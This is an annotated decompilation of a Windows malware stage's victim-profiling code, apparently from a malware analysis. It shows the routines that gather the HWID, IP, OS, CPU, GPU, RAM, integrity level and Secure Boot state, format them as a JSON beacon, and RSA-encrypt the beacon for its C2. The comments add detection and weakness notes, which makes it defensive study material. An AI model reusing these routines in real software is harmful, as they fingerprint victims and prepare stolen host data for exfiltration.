            // {"HWID":"%s", "Session":"%lu", "Owner":"%s", "IP":"%s", "OS":"%s", "Edition":"%s", "CPU":"%s", "GPU":"%s", "RAM":"%lu", "Integrity":"%lu", "SecureBoot":"%i", "Build":"%lu"}
            v31 = deobfuscate_wstring(word_14000B440, 0xADu, 0);
            GPUinfo11 = &unknown;
            formatstr = v31;
            CPUinfo11 = &unknown;
            ProductName_1 = &unknown;
            v36 = v28 < 0x1F4;
            publicip11 = &unknown;
            v6 = v44;
            // If the profile is >= 500 WCHARs, GPU/CPU/Edition/IP are sent
            // empty instead of being truncated (same flag tested three times).
            if ( v36 )
            {
              GPUinfo11 = GPUinfo1;
              if ( v36 )
              {
                CPUinfo11 = CPUinfo1;
                if ( v36 )
                  ProductName_1 = v44;
              }
            }

            if ( v48 < 0x1F4 )
              publicip11 = publicip1;

            // {
            //     "HWID": "%s",
            //     "Session": "%lu",
            //     "Owner": "%s",
            //     "IP": "%s",
            //     "OS": "%s",
            //     "Edition": "%s",
            //     "CPU": "%s",
            //     "GPU": "%s",
            //     "RAM": "%lu",
            //     "Integrity": "%lu",
            //     "SecureBoot": "%i",
            //     "Build": "%lu"
            // }
            if ( snwprintf(
                   buf,
                   bufsz,
                   formatstr,
                   HWID,
                   gSession_RNG_14000F568,
                   RegisteredOwnerData1,
                   publicip11,
                   CurrentBuild_1,
                   ProductName_1,
                   CPUinfo11,
                   GPUinfo11,
                   RAM_GB1,
                   IntegrityLevel1,
                   isUEFISecureBootEnabled,
                   29082022) >= 0 )             // literal "Build" value; author reads it as the date 2022-08-29
            {
              wcslen(buf);                      // result discarded (decompiler artifact / no effect)
              v38 = rsaenc_base64_140001370(buf);// RSA public-key encrypt, then Base64
              v43 = v38;
              if ( v38 )
                v43 = urlenc_140005498(v38, 1); // URL-encode for the POST body
            }

            RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, buf);
          }
          else
          {
            v6 = v44;
          }
        }
      }
    }

    // Free every field that was actually allocated (skip the placeholder).
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, HWID);
    if ( RegisteredOwnerData1 && RegisteredOwnerData1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, RegisteredOwnerData1);

    if ( v6 && v6 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v6);

    if ( publicip1 && publicip1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, publicip1);

    if ( CurrentBuild_1 && CurrentBuild_1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, CurrentBuild_1);

    if ( CPUinfo1 && CPUinfo1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, CPUinfo1);

    if ( GPUinfo1 && GPUinfo1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, GPUinfo1);
  }

  return v43;
}

isUEFISecureBootEnabled_140005CB4

/*
 * Read HKLM\SYSTEM\CurrentControlSet\Control\SecureBoot\State\UEFISecureBootEnabled
 * through the native registry API and return 1 iff the value exists, is
 * REG_DWORD and equals 1; 0 otherwise, including every failure path.  The
 * result is reported to the C2 as the "SecureBoot" field of the profile.
 *
 * OBJECT_ATTRIBUTES is filled by hand: Length 48 (x64 sizeof), Attributes
 * 0x40 = OBJ_CASE_INSENSITIVE; NtOpenKey access 1 = KEY_QUERY_VALUE.
 *
 * Two-call pattern: the first NtQueryValueKey passes a zero-length buffer
 * only to learn ResultLength (its status - expected STATUS_BUFFER_TOO_SMALL -
 * is not checked), then the buffer is allocated (flag 8 = HEAP_ZERO_MEMORY)
 * and the query repeated.  If the first call fails outright, ResultLength
 * stays 0, a zero-byte allocation is attempted and the second query fails,
 * so the function still returns 0.
 */
_BOOL8 isUEFISecureBootEnabled_140005CB4()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  ret = 0;
  Handle = 0i64;
  ResultLength = 0;
  // \Registry\Machine\SYSTEM\CurrentControlSet\Control\SecureBoot\State
  v1 = deobfuscate_wstring(word_14000B370, 0x44u, 1);
  RtlInitUnicodeString(&v6, v1);
  v7.Length = 48;                               // sizeof(OBJECT_ATTRIBUTES) on x64
  v7.ObjectName = &v6;
  v7.RootDirectory = 0i64;
  v7.Attributes = 64;                           // OBJ_CASE_INSENSITIVE
  *(_OWORD *)&v7.SecurityDescriptor = 0i64;
  if ( NtOpenKey(&Handle, 1u, &v7) >= 0 )       // 1 == KEY_QUERY_VALUE
  {
    // UEFISecureBootEnabled
    v2 = deobfuscate_wstring(word_14000B400, 0x16u, 1);
    RtlInitUnicodeString(&ValueName, v2);
    // Size probe; status deliberately ignored.
    NtQueryValueKey(Handle, &ValueName, KeyValuePartialInformation, 0i64, 0, &ResultLength);
    keyvalueinfo = (KEY_VALUE_PARTIAL_INFORMATION *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, ResultLength);
    if ( keyvalueinfo )
    {
      // Only a REG_DWORD with value exactly 1 counts as "enabled".
      if ( NtQueryValueKey(Handle, &ValueName, KeyValuePartialInformation, keyvalueinfo, ResultLength, &ResultLength) >= 0
        && keyvalueinfo->Type == REG_DWORD )
      {
        LOBYTE(ret) = *(_DWORD *)keyvalueinfo->Data == 1;
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, keyvalueinfo);
    }

    NtClose(Handle);
  }

  return ret;
}

get_HWID_MAC_VolumeSerialNumber_md5wstr

/*
 * Build the host identifier ("HWID"): MD5 over a 10-byte buffer made of the
 * adapter's permanent MAC address (6 bytes) followed by the system volume
 * serial number (4 bytes, little-endian - the byte-wise stores into v9[6..9]
 * are how the decompiler rendered the DWORD write).  The hex digest md5str is
 * copied into a freshly allocated 0x42-byte (33 WCHAR) buffer and returned as
 * a wide string; NULL if the MAC, the serial, the hash or the allocation
 * fails.  Caller frees with RtlFreeHeap.
 *
 * The do/while is an inlined bounded wide-string copy (strcpy_s-style); the
 * -2147483613 sentinel is its length guard and cannot trigger for a 33-WCHAR
 * copy.
 *
 * Security note: the author states this value is also the AES key for later
 * C2 traffic.  If so, the key is a deterministic function of two
 * host-discoverable, low-entropy values (MAC + volume serial); anyone with
 * access to the host, or to those two values from a forensic image, can
 * reconstruct it and decrypt captured traffic.
 */
_WORD *get_HWID_MAC_VolumeSerialNumber_md5wstr()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v0 = 0i64;
  if ( (unsigned int)getMAC_1400076F0(mac) )
  {
    VolumeSerialNumber = get_VolumeSerialNumber_1400078C4();
    if ( VolumeSerialNumber )
    {
      // v9[0..5] = MAC, v9[6..9] = serial (LE), written out of order by the decompiler.
      v9[6] = VolumeSerialNumber;
      *(_WORD *)&v9[7] = VolumeSerialNumber >> 8;
      *(_DWORD *)v9 = *(_DWORD *)mac;
      *(_WORD *)&v9[4] = *(_WORD *)&mac[4];
      v9[9] = HIBYTE(VolumeSerialNumber);
      // MAC+VolumeSerialNumber   6+4 =10byte
      if ( (unsigned int)md5_1400017B0(v9, 0xAu, md5str) )
      {
        // 0x42 bytes = 33 WCHARs: 32 hex digits + NUL.
        Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x42ui64);
        v0 = Heap;
        if ( Heap )
        {
          // Inlined bounded copy of md5str into Heap (max 33 WCHARs).
          v3 = Heap;
          v4 = 33i64;
          v5 = (char *)((char *)md5str - (char *)Heap);
          do
          {
            if ( v4 == -2147483613 )
              break;

            v6 = *(_WORD *)((char *)v3 + (_QWORD)v5);
            if ( !v6 )
              break;

            *v3++ = v6;
            --v4;
          }
          while ( v4 );

          v7 = v3 - 1;
          if ( v4 )
            v7 = v3;

          *v7 = 0;
        }
      }
    }
  }

  return v0;
}

/*
 * Read a network adapter's permanent (burned-in) MAC address into
 * OutputBuffer (6 bytes).  Returns 1 on success, 0 otherwise.
 *
 * Method: take the adapter service-name GUID returned by
 * getNetworkCards_ServiceName_140007A1C(), build "\Device\{GUID}", open it
 * with NtCreateFile (DesiredAccess 0xC0000000 = GENERIC_READ|GENERIC_WRITE,
 * FileAttributes 0x80 = FILE_ATTRIBUTE_NORMAL, ShareAccess 1 =
 * FILE_SHARE_READ, CreateDisposition 1 = FILE_OPEN) and issue
 * IOCTL_NDIS_QUERY_GLOBAL_STATS with OID_802_3_PERMANENT_ADDRESS.  Because
 * the *permanent* OID is queried (not OID_802_3_CURRENT_ADDRESS), a locally
 * administered / spoofed MAC does not change the resulting HWID.
 *
 * Buffer: 2 * (wcslen(GUID) + 10) bytes is enough for "\Device\" (8) + GUID
 * + NUL.  The wcsncpy_0 / wscat argument order as shown is the decompiler's
 * rendering of bounded copy/append helpers; the author's inline comments
 * give the intended string contents.
 *
 * The file handle, the path buffer and the service-name structure are all
 * released on every path.
 */
__int64 __fastcall getMAC_1400076F0(PVOID OutputBuffer)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  FileHandle = 0i64;
  // {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
  netServiceName = getNetworkCards_ServiceName_140007A1C();
  Heap = 0i64;
  InputBuffer = OID_802_3_PERMANENT_ADDRESS;    // burned-in address, immune to MAC spoofing
  v5 = netServiceName;
  if ( netServiceName )
  {
    Data = (wchar_t *)netServiceName->Data;
    v7 = wcslen((wchar_t *)netServiceName->Data);
    Heap = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v7 + 0xA));
    if ( Heap )
    {
      // \Device\
      v8 = (unsigned int)deobfuscate_wstring(word_14000B8B0, 9u, 1);
      v9 = wcslen(Data);
      wcsncpy_0(Heap, (const wchar_t *)(unsigned int)(v9 + 10), v8);// \Device\
      v10 = wcslen(Data);
      wscat(Heap, (unsigned int)(v10 + 10), (__int64)Data);// \Device\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
      RtlInitUnicodeString(&DestinationString, Heap);
      ObjectAttributes.RootDirectory = 0i64;
      ObjectAttributes.Length = 48;             // sizeof(OBJECT_ATTRIBUTES) on x64
      ObjectAttributes.Attributes = 64;         // OBJ_CASE_INSENSITIVE
      ObjectAttributes.ObjectName = &DestinationString;
      *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
      // Open the NDIS device object and query the 6-byte permanent address.
      if ( NtCreateFile(&FileHandle, 0xC0000000, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 1u, 1u, 0, 0i64, 0) >= 0
        && NtDeviceIoControlFile(
             FileHandle,
             0i64,
             0i64,
             0i64,
             &IoStatusBlock,
             IOCTL_NDIS_QUERY_GLOBAL_STATS,
             &InputBuffer,
             4u,
             OutputBuffer,
             6u) >= 0 )
      {
        v1 = 1;
      }
    }
  }

  if ( FileHandle )
    NtClose(FileHandle);

  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  if ( v5 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v5);

  return v1;
}

/*
 * Return the volume serial number of the system volume, or 0 on failure.
 *
 * Opens "\SystemRoot\" with NtCreateFile (FILE_GENERIC_READ, ShareAccess 3 =
 * FILE_SHARE_READ|FILE_SHARE_WRITE, CreateDisposition 1 = FILE_OPEN,
 * CreateOptions 1 = FILE_DIRECTORY_FILE) and queries FileFsVolumeInformation,
 * growing the buffer in 1024-byte steps while the call returns -1073741789
 * (0xC0000023, STATUS_BUFFER_TOO_SMALL).
 *
 * Observation: FileHandle is never closed - not on success, not on the
 * allocation-failure break - so every call leaks one handle to \SystemRoot.
 * On this page the function is called once per check-in profile, so the
 * leak is bounded by the number of beacons.
 */
__int64 get_VolumeSerialNumber_1400078C4()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  VolumeSerialNumber = 0;
  FileHandle = 0i64;
  v1 = 0i64;
  v2 = 0;
  // \SystemRoot\
  v3 = deobfuscate_wstring(word_14000B7D0, 0xDu, 1);
  RtlInitUnicodeString(&v7, v3);
  ObjectAttributes.Length = 48;                 // sizeof(OBJECT_ATTRIBUTES) on x64
  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.Attributes = 64;             // OBJ_CASE_INSENSITIVE
  ObjectAttributes.ObjectName = &v7;
  *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
  if ( NtCreateFile(
         &FileHandle,
         FILE_GENERIC_READ,
         &ObjectAttributes,
         &IoStatusBlock,
         0i64,
         FILE_ATTRIBUTE_NORMAL,
         3u,
         1u,
         1u,
         0i64,
         0) >= 0 )
  {
    // Grow-and-retry loop: 1 KB, 2 KB, ... until the query fits.
    while ( 1 )
    {
      if ( v1 )
        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v1);

      v2 += 1024;
      Heap = (FILE_FS_VOLUME_INFORMATION *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v2);
      v1 = Heap;
      if ( !Heap )
        break;

      v5 = NtQueryVolumeInformationFile(FileHandle, &IoStatusBlock, Heap, v2, FileFsVolumeInformation);
      if ( v5 != -1073741789 )                  // anything but STATUS_BUFFER_TOO_SMALL ends the loop
      {
        if ( v5 >= 0 )
          VolumeSerialNumber = v1->VolumeSerialNumber;

        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v1);
        return VolumeSerialNumber;              // NOTE: FileHandle is not closed
      }
    }
  }

  return VolumeSerialNumber;                    // NOTE: FileHandle is not closed
}

get_RegisteredOwner_data_140006238

/*
 * Return the "RegisteredOwner" value under
 * \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, as read by
 * Query_Key_ValueData_140008144 (the caller, getinfo, frees the result with
 * RtlFreeHeap; NULL is handled there by substituting the empty placeholder).
 *
 * The two do/while loops are inlined bounded wide-string copies that stage
 * the deobfuscated key path (64-WCHAR limit) and value name (16-WCHAR limit)
 * into the globals CurrentVersion and RegisteredOwner.  The large negative
 * sentinels (-2147483582, -2147483630) are the copy's length guard as the
 * decompiler rendered it and cannot be reached for these sizes.
 */
wchar_t *get_RegisteredOwner_data_140006238()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
  v1 = CurrentVersion;
  v2 = 64i64;
  v3 = (char *)v0 - (char *)CurrentVersion;
  // Bounded copy of the key path into the global CurrentVersion (max 64 WCHARs).
  do
  {
    if ( v2 == -2147483582 )
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  v6 = 16i64;
  if ( v2 )
    v5 = v1;

  *v5 = 0;
  // RegisteredOwner
  v7 = (char *)deobfuscate_wstring(word_14000B160, 0x10u, 1) - (char *)RegisteredOwner;
  v8 = RegisteredOwner;
  // Bounded copy of the value name into the global RegisteredOwner (max 16 WCHARs).
  do
  {
    if ( v6 == -2147483630 )
      break;

    v9 = *(__int16 *)((char *)v8 + v7);
    if ( !v9 )
      break;

    *v8++ = v9;
    --v6;
  }
  while ( v6 );

  v10 = v8 - 1;
  if ( v6 )
    v10 = v8;

  *v10 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)CurrentVersion, (const WCHAR *)RegisteredOwner);// ret RegisteredOwner data
}

get_publicip_1400059FC

_WORD *__fastcall get_publicip_1400059FC(void *hSession)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Fetches the host's public IP with a plain-HTTP GET / to api.ipify.org
  // (port 0x50 = 80; WinHttpOpenRequest flags are 0, i.e. no WINHTTP_FLAG_SECURE)
  // over the caller-supplied WinHTTP session.  Returns a freshly allocated
  // wide-string copy of the response body (caller frees via RtlFreeHeap) or
  // NULL on any failure / non-200 status.
  // Detection note: an unencrypted request to api.ipify.org from code that
  // otherwise talks only HTTPS is a cheap network indicator for this stage.
  // NOTE(review): the body is not validated as an IP literal - whatever the
  // server (or an on-path responder on port 80) returns is copied verbatim
  // into the host profile.
  v1 = 0i64;                                    // result
  v14 = 4;                                      // sizeof(DWORD) for the status-code query
  LODWORD(v13) = 0;                             // bytes received (filled by get_HttpReadData)
  v12 = 0;                                      // HTTP status code
  if ( hSession )
  {
    // api.ipify.org
    pswzServerName = deobfuscate_wstring(word_14000B188, 0xEu, 1);
    hConnect = WinHttpConnect(hSession, pswzServerName, 0x50u, 0);
    if ( hConnect )
    {
      // /
      v5 = deobfuscate_wstring(word_14000B1A8, 2u, 0);
      // GET
      v6 = deobfuscate_wstring(word_14000B098, 4u, 0);
      hRequest = WinHttpOpenRequest(hConnect, v6, v5, 0i64, 0i64, 0i64, 0);
      hRequest1 = hRequest;
      if ( hRequest )
      {
        if ( WinHttpSendRequest(hRequest, 0i64, 0, 0i64, 0, 0, 0i64) )
        {
          if ( WinHttpReceiveResponse(hRequest1, 0i64) )
          {
            // 0x20000013 = WINHTTP_QUERY_STATUS_CODE (19) | WINHTTP_QUERY_FLAG_NUMBER
            if ( WinHttpQueryHeaders(hRequest1, 0x20000013u, 0i64, &v12, &v14, 0i64) )
            {
              if ( v12 == HTTP_STATUS_OK )
              {
                Data = (char *)get_HttpReadData(hRequest1, (unsigned int *)&v13);
                if ( Data )
                {
                  if ( (_DWORD)v13 )
                  {
                    // 8 = HEAP_ZERO_MEMORY; (len + 1) wide chars so the result is NUL-terminated
                    Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v13 + 1));
                    v1 = Heap;
                    if ( Heap )
                      str2wstr_140005424(Data, Heap);
                  }

                  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Data);
                }
              }
            }
          }
        }

        WinHttpCloseHandle(hRequest1);
      }

      WinHttpCloseHandle(hConnect);
    }
  }

  return v1;
}

get_CurrentBuild_140005BA0

wchar_t *get_CurrentBuild_140005BA0()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Host-profile collector: reads
  // HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild.  Same
  // decode-then-bounded-copy pattern as get_RegisteredOwner_data_140006238,
  // except the key path and value name are staged in what appear to be local
  // buffers (v14, v13; declarations collapsed).  Returns whatever
  // Query_Key_ValueData_140008144 returns (value data or NULL).

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
  v1 = v14;
  v2 = 64i64;                                   // key path: at most 64 wide chars
  v3 = (char *)v0 - (char *)v14;                // source read at the same offset as the write cursor
  do
  {
    if ( v2 == -2147483582 )                    // dead sentinel check (compiler artefact; v2 counts 64 -> 0)
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  if ( v2 )
    v5 = v1;

  *v5 = 0;                                      // always NUL-terminate (overwrites last char on truncation)
  // CurrentBuild
  v6 = deobfuscate_wstring(word_14000B1B0, 0xDu, 1);
  v7 = 14i64;                                   // value name: at most 14 wide chars
  v8 = (char *)v6 - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483632 )                    // dead sentinel check
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_ProcessorNameString_1400055A4

wchar_t *get_ProcessorNameString_1400055A4()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Host-profile collector: reads the CPU model string from
  // HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
  // (the volatile HARDWARE hive).  Same decode-then-bounded-copy pattern as the
  // other registry collectors; v14/v13 appear to be local staging buffers.
  // Returns whatever Query_Key_ValueData_140008144 returns (value data or NULL).

  v0 = 65i64;                                   // key path: at most 65 wide chars
  // \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  v1 = deobfuscate_wstring(word_14000B1F0, 0x41u, 1);
  v2 = v14;
  v3 = (char *)v1 - (char *)v14;                // source read at the same offset as the write cursor
  do
  {
    if ( v0 == -2147483581 )                    // dead sentinel check (compiler artefact; v0 counts 65 -> 0)
      break;

    v4 = *(__int16 *)((char *)v2 + v3);
    if ( !v4 )
      break;

    *v2++ = v4;
    --v0;
  }
  while ( v0 );

  v5 = v2 - 1;
  v6 = v0 == 0;                                 // budget exhausted -> terminator goes over the last copied char
  v7 = 20i64;                                   // value name: at most 20 wide chars
  if ( !v6 )
    v5 = v2;

  *v5 = 0;
  // ProcessorNameString
  v8 = (char *)deobfuscate_wstring(word_14000B278, 0x14u, 1) - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483626 )                    // dead sentinel check
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_GPU_info_140005758

wchar_t *get_GPU_info_140005758()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Host-profile collector: reads the primary display adapter name from
  // HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT\PrimaryAdapterString.
  // Same decode-then-bounded-copy pattern as the other registry collectors;
  // v14/v13 appear to be local staging buffers.  Returns whatever
  // Query_Key_ValueData_140008144 returns - presumably NULL on machines where
  // the WinSAT key is absent (not verified here).

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
  v0 = deobfuscate_wstring(word_14000B2B0, 0x46u, 1);
  v1 = v14;
  v2 = 71i64;                                   // key path: at most 71 wide chars
  v3 = (char *)v0 - (char *)v14;                // source read at the same offset as the write cursor
  do
  {
    if ( v2 == -2147483575 )                    // dead sentinel check (compiler artefact; v2 counts 71 -> 0)
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  if ( v2 )
    v5 = v1;

  *v5 = 0;                                      // always NUL-terminate (overwrites last char on truncation)
  // PrimaryAdapterString
  v6 = deobfuscate_wstring(word_14000B340, 0x15u, 1);
  v7 = 22i64;                                   // value name: at most 22 wide chars
  v8 = (char *)v6 - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483624 )                    // dead sentinel check
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_RAM_GB_140005C78

__int64 get_RAM_GB_140005C78()
{
  unsigned int v0; // ebx
  struct _MEMORYSTATUSEX v2; // [rsp+20h] [rbp-48h] BYREF

  // Host-profile collector: total physical RAM in (approximate) GB.
  // Returns 0 when GlobalMemoryStatusEx fails.
  v2.dwLength = 64;                             // sizeof(MEMORYSTATUSEX); the API rejects the call without it
  v0 = 0;
  if ( GlobalMemoryStatusEx(&v2) )
    // ullTotalPhys >> 20 is MiB; dividing by 1000 rather than 1024 gives a
    // decimal approximation (16 GiB -> 16384 / 1000 = 16), which is what the
    // operator's profile format apparently expects.
    return (unsigned int)(v2.ullTotalPhys >> 20) / 1000;// GB

  return v0;
}

get_ProductName_140005680

wchar_t *get_ProductName_140005680()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Host-profile collector: reads the Windows edition string from
  // HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName.  Same
  // decode-then-bounded-copy pattern as the other registry collectors;
  // v14/v13 appear to be local staging buffers.  Returns whatever
  // Query_Key_ValueData_140008144 returns (value data or NULL).

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
  v1 = v14;
  v2 = 64i64;                                   // key path: at most 64 wide chars
  v3 = (char *)v0 - (char *)v14;                // source read at the same offset as the write cursor
  do
  {
    if ( v2 == -2147483582 )                    // dead sentinel check (compiler artefact; v2 counts 64 -> 0)
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  if ( v2 )
    v5 = v1;

  *v5 = 0;                                      // always NUL-terminate (overwrites last char on truncation)
  // ProductName
  v6 = deobfuscate_wstring(word_14000B1D0, 0xCu, 1);
  v7 = 15i64;                                   // value name: at most 15 wide chars
  v8 = (char *)v6 - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483631 )                    // dead sentinel check
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_IntegrityLevel_14000591C

// ucmShowProcessIntegrityLevel
__int64 get_IntegrityLevel_14000591C()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Returns the integrity RID of the current process token - the last
  // sub-authority of the TokenIntegrityLevel SID - or 0 if it cannot be read.
  // Reference thresholds (SDK): SECURITY_MANDATORY_LOW_RID 0x1000,
  // MEDIUM 0x2000, HIGH 0x3000, SYSTEM 0x4000.  The lead comment names the
  // UACMe helper (ucmShowProcessIntegrityLevel) this was apparently lifted from.
  dwIntegrityLevel = 0;
  TokenInformationLength = 0;
  Handle = (HANDLE)-1i64;
  // -1 = current-process pseudo handle; 0x18 = TOKEN_QUERY (0x8) | TOKEN_QUERY_SOURCE (0x10)
  if ( NtOpenProcessToken((HANDLE)0xFFFFFFFFFFFFFFFFi64, 0x18u, &Handle) >= 0 )
  {
    // sizing call: zero-length buffer, only TokenInformationLength is wanted
    NtQueryInformationToken(Handle, TokenIntegrityLevel, 0i64, 0, &TokenInformationLength);
    psid = (PSID *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, TokenInformationLength);
    if ( psid )
    {
      if ( NtQueryInformationToken(Handle, TokenIntegrityLevel, psid, TokenInformationLength, &TokenInformationLength) >= 0 )
      {
        // buffer is a TOKEN_MANDATORY_LABEL whose first field is Label.Sid, hence *psid
        AccountSubAuthorityCount = RtlSubAuthorityCountSid(*psid);
        // integrity RID = last sub-authority of the mandatory-label SID
        dwIntegrityLevel = *RtlSubAuthoritySid(*psid, (unsigned __int8)(*AccountSubAuthorityCount - 1));
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, psid);
    }
  }

  // NOTE(review): Handle is pre-set to -1, so when NtOpenProcessToken fails
  // this still calls NtClose((HANDLE)-1) on the process pseudo handle.
  // Presumably harmless (the kernel rejects/ignores it), but it is a latent
  // bug inherited from the reference snippet rather than intent.
  if ( Handle )
    NtClose(Handle);

  return dwIntegrityLevel;
}

rsaenc_base64_140001370

CHAR *__fastcall rsaenc_base64_140001370(const WCHAR *indata)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // RSA-encrypts a wide string under the operator's public key embedded in the
  // image and returns the ciphertext as a base64 ANSI string (no CRLF), or NULL.
  // Pipeline: indata -> UTF-8 -> BCryptEncrypt(PKCS#1 v1.5) with a key decoded
  // from an embedded DER SubjectPublicKeyInfo -> CryptBinaryToStringA(base64).
  // Only the public half ships in the binary, so whatever goes through this path
  // cannot be recovered from a traffic capture without the operator's private
  // key (contrast the HWID-derived AES key used for C2 replies).  What `indata`
  // carries is decided by the caller and not visible here.
  // Ownership: the returned buffer is from RtlAllocateHeap and is the caller's.
  // NOTE(review): the "RSA" algorithm-provider handle (v25) is opened but never
  // closed on any path - the AES routine below does call
  // BCryptCloseAlgorithmProvider.  One provider handle leaks per call.
  pcbStructInfo = 550;                          // cbEncoded for CryptDecodeObjectEx; reused as its out-size afterwards
  v25 = 0i64;                                   // BCRYPT_ALG_HANDLE ("RSA")
  v2 = 0i64;                                    // result: base64 string
  phKey = 0i64;                                 // BCRYPT_KEY_HANDLE from CryptImportPublicKeyInfoEx2
  pbInput = 0i64;                               // UTF-8 plaintext
  pvStructInfo = 0i64;                          // decoded CERT_PUBLIC_KEY_INFO (allocated by CryptDecodeObjectEx)
  v4 = 4i64;                                    // 4 x 128-byte chunks of the key blob are copied below
  pcbResult = 0;
  pcchString = 0;
  Heap = 0i64;                                  // RSA ciphertext
  v6 = pbEncoded;                               // staging buffer for the DER-encoded public key
  // openssl rsa -pubin -inform der -in rsakey_X509_14000A0D0.der  -noout -text


  // Public-Key: (4095 bit)
  // Modulus:
  //     43:43:71:5d:2c:12:70:e2:50:d5:67:e4:05:02:01:
